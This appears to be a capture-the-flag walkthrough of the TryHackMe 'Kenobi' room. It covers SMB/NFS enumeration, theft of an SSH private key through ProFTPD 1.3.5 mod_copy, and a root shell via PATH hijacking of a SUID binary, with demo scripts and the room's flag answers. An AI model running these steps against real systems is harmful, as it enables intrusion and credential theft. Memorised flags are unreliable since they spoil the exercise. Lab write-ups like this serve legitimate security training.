https://tryhackme.com/room/kenobi

Q1>
nmap -sT 10.10.103.23 -p-
Open Ports :
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33813/tcp open unknown
37651/tcp open unknown
40133/tcp open unknown
54859/tcp open unknown
Answer is 7: the last 4 ports show no recognised service (high-numbered ports, most likely helper services that rpcbind assigns dynamically), so only the 7 ports with a known service are counted.
Enumerating for samba shares
Q1>
possible commands :
enum4linux
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.103.23
3 shares found :
Sharename    Type    Comment
---------    ----    -------
print$       Disk    Printer Drivers
anonymous    Disk
IPC$         IPC     IPC Service (kenobi server (Samba, Ubuntu))
Q2>
smbclient //10.10.103.23/Anonymous
the share allows anonymous (null-session) access, so just press Enter at the password prompt (or pass -N to skip it).
filename = log.txt
download it with the get command, or fetch the whole share recursively with
smbget -R smb://<ip>/anonymous
Q3>
21
Q4>
Port 111 (rpcbind): the portmapper that maps RPC program numbers to the ports they listen on. NFS clients query it to find mountd and nfsd, so being able to reach rpcbind lets us discover what the host exports.
to enumerate :
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.103.23
Exported directory (mountable): /var
Gain initial access with ProFtpd
Q1>
connect to proftpd,
nc 10.10.103.23 21
version = 1.3.5
Q2>
searchsploit ProFTPd 1.3.5
number of exploits : 4
link to exploit-db: ProFTPd 1.3.5 — File Copy — Linux remote Exploit (exploit-db.com)
Q3>
log.txt told us the location of kenobi's private key (/home/kenobi/.ssh/id_rsa). ProFTPD 1.3.5's mod_copy lets an unauthenticated client copy files on the server with SITE CPFR (copy from) and SITE CPTO (copy to), so type these into the nc session from Q1:
SITE CPFR /home/kenobi/.ssh/id_rsa
copy it into /var, because /var is the directory exported over NFS, so we can read the copy from the mount.
SITE CPTO /var/temp_id-rsa

It was found with the nmap scan that /var can be mounted.
Create a sub-directory in the mount folder
mkdir /mnt/kenobiNFS
Mount the directory
mount 10.10.103.23:/var /mnt/kenobiNFS
#mount machine_ip:/exported_path /local_mount_point
copy temp_id-rsa from the mount to your home directory, chmod it to 600 (ssh refuses keys that are group- or world-readable) and log in with ssh -i as kenobi.
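The staging step above, as an added example (not code from the room or this write-up): a small sh helper that checks the file pulled through mod_copy really is a PEM private key, copies it out of the mount and verifies it ends up mode 600 before you try ssh -i. The paths /mnt/kenobiNFS/temp_id-rsa and ~/temp_id-rsa are the ones used in these notes; the demo at the bottom runs on a constructed fake key so it works without the NFS mount.

```sh
#!/bin/sh
# Added example, not from the original notes. Stages a private key copied off
# the NFS export so OpenSSH will accept it.

# stage_key SRC DST
# Verifies SRC looks like a PEM private key, copies it to DST with mode 600
# (OpenSSH rejects group/world-readable keys), reads the mode back and prints
# it. Returns non-zero on any failure so the caller stops before trying SSH.
stage_key() {
    src="$1"
    dst="$2"
    # The file fetched via SITE CPFR/CPTO may be empty or garbage if the copy
    # failed; check for a PEM header before going further.
    if ! head -n 1 "$src" 2>/dev/null | grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
        echo "$src does not look like a PEM private key" >&2
        return 1
    fi
    cp "$src" "$dst" || return 1
    chmod 600 "$dst" || return 1
    # Read the mode back rather than trusting chmod (GNU stat, BSD fallback).
    mode=$(stat -c %a "$dst" 2>/dev/null || stat -f %Lp "$dst") || return 1
    if [ "$mode" != "600" ]; then
        echo "unexpected mode $mode on $dst" >&2
        return 1
    fi
    echo "$mode"
}

# demo_stage_key: runs stage_key on a constructed stand-in for
# /mnt/kenobiNFS/temp_id-rsa (assumption: not a real key), prints "600".
demo_stage_key() {
    tmp=$(mktemp -d)
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' \
                  'constructed-placeholder-not-a-real-key' \
                  '-----END RSA PRIVATE KEY-----' > "$tmp/temp_id-rsa"
    chmod 644 "$tmp/temp_id-rsa"   # loose perms, as a fresh copy often has
    if stage_key "$tmp/temp_id-rsa" "$tmp/id_rsa"; then rc=0; else rc=1; fi
    rm -rf "$tmp"
    return $rc
}

demo_stage_key
```

On the real box the call is `stage_key /mnt/kenobiNFS/temp_id-rsa ~/temp_id-rsa` followed by `ssh -i ~/temp_id-rsa kenobi@10.10.103.23`; if the function prints anything other than 600, fix the copy before wondering why ssh prompts for a password.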
Q4>
user.txt = d0b0f3f53b6caa532a83915e19224899
Privilege escalation via PATH variable manipulation
Q1>
find / -perm -u=s -type f 2>/dev/null
suspicious file: /usr/bin/menu
#menu is not a standard system binary, so it stands out among the usual SUID files
Q2>
run the binary: /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
answer : 3

Q4> run the strings command
strings /usr/bin/menu
we see it calls curl by its bare name (no absolute path), so the SUID binary resolves "curl" through whatever PATH we give it.
so we make a malicious "curl" in /tmp that just starts a shell, and put /tmp at the front of PATH. Because menu runs with root privileges (SUID), the shell it spawns is a root shell.
$ cd /tmp
$ echo /bin/sh > curl
$ chmod 777 curl
$ export PATH=/tmp:$PATH
$ # /tmp is prepended so that when menu looks up curl it finds ours first;
$ # now run /usr/bin/menu and pick the option that calls curl.
$ # Note: on Ubuntu /bin/sh is dash, which keeps the effective uid; bash would
$ # drop it again unless started with -p, so keep /bin/sh as the payload.
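The hijack above, re-created as an added example (not code from the room or this write-up) that runs on any Linux box without a SUID binary: the three "victim" functions stand in for how menu appears to call curl (an assumption drawn from the strings output), the fake curl only drops a marker file instead of spawning /bin/sh, and the two hardened variants show the fixes a developer of menu should have used. The -m 2 timeout on curl is added here so a real curl never hangs the demo.

```sh
#!/bin/sh
# Added example; not code from the room or the original write-up.
# Demonstrates the PATH hijack used against /usr/bin/menu and its two fixes.

# Vulnerable pattern: "curl" by bare name, resolved through the caller's PATH.
vulnerable_menu() {
    curl -I -m 2 localhost >/dev/null 2>&1 || true
}

# Fix 1: reset PATH to fixed, root-owned directories before the lookup.
hardened_menu_path() {
    (
        PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
        export PATH
        hash -r
        curl -I -m 2 localhost >/dev/null 2>&1 || true
    )
}

# Fix 2: call the binary by absolute path so PATH is never consulted.
hardened_menu_abs() {
    /usr/bin/curl -I -m 2 localhost >/dev/null 2>&1 || true
}

# run_with_hijack VICTIM
# Creates a writable directory holding a fake curl, prepends it to PATH
# (what "export PATH=/tmp:$PATH" does in the walkthrough), runs VICTIM and
# prints "hijacked" if the fake curl executed, "safe" otherwise.
run_with_hijack() {
    victim="$1"
    dir=$(mktemp -d)
    marker="$dir/marker"
    # The payload: records the uid it ran as. With a SUID-root caller this is
    # the spot where the walkthrough's "/bin/sh" hands out a root shell.
    cat > "$dir/curl" <<EOF
#!/bin/sh
id -u > "$marker"
EOF
    chmod 755 "$dir/curl"
    saved_path="$PATH"
    PATH="$dir:$PATH"
    export PATH
    hash -r                      # forget any cached location of curl
    "$victim"
    PATH="$saved_path"
    export PATH
    hash -r
    if [ -f "$marker" ]; then result=hijacked; else result=safe; fi
    rm -rf "$dir"
    echo "$result"
}

# Stand-alone run: show all three outcomes.
echo "vulnerable:    $(run_with_hijack vulnerable_menu)"
echo "fixed PATH:    $(run_with_hijack hardened_menu_path)"
echo "absolute path: $(run_with_hijack hardened_menu_abs)"
```

Only the first line should read "hijacked". The same check works as a quick triage for any SUID binary you find: put a marker-dropping script named after each bare command from `strings` into a directory at the front of PATH, run the binary, and see which markers appear.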

root flag = 177b3cd8562289f37382721c28381f02
